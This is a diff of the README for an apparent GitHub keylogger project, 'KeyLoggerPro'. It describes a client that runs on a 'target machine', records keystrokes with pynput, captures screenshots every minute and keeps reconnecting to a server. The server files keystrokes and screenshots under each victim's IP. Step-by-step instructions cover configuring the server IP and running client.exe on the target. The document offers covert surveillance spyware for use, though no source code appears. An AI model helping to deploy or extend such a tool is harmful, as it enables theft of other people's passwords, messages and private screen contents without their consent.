Itamar2562/KeyLoggerPro/README.md

 ### Server
 - Listens for incoming client connections.
+- Stores all received keystrokes in `Keylog.txt`.
-- Saves all received keystrokes into organized folders.
+- Saves received screenshots into `Screenshots/` inside each client’s folder.

 ### Client
 - Runs on the target machine.
 - Captures keystrokes using `pynput`.
+- Captures the screen using `PIL.ImageGrab` and sends screenshots every minute.
-- Continuously attempts to connect and send data to the server.
+- Continuously attempts to reconnect if the server is unavailable.

 ---

-## How to use
+## How to Use

 1. **Configure IP and Port**
-   - Open `config.json`.
+   - Open `Client/config.json`.
-   - Change the `IP` field to your server’s IP address.
-   - Ensure the `PORT` is free and matches the server.
+   - Change `IP` to your server’s IP address and ensure the port matches the server.

 2. **Run the Server**
-   - Start the server script on your designated machine.
+   - Execute `Server/server.py` on the server machine.

 3. **Run the Client**
-   - Execute `client.exe` on the target machine with the config file in the **same folder**.
+   - Run `Client/client.exe` on the target machine with `config.json` in the **same folder** .

-4. **View Captured Data**
+4. **Monitor Captured Data**
-   - Keystrokes will appear in the `Targets` folder on the server, separated by client IP.
+   - Keystrokes are saved in `Targets/data of <client_ip>/Keylog.txt`.
+   - Screenshots are saved in `Targets/data of <client_ip>/Screenshots/`.

 ---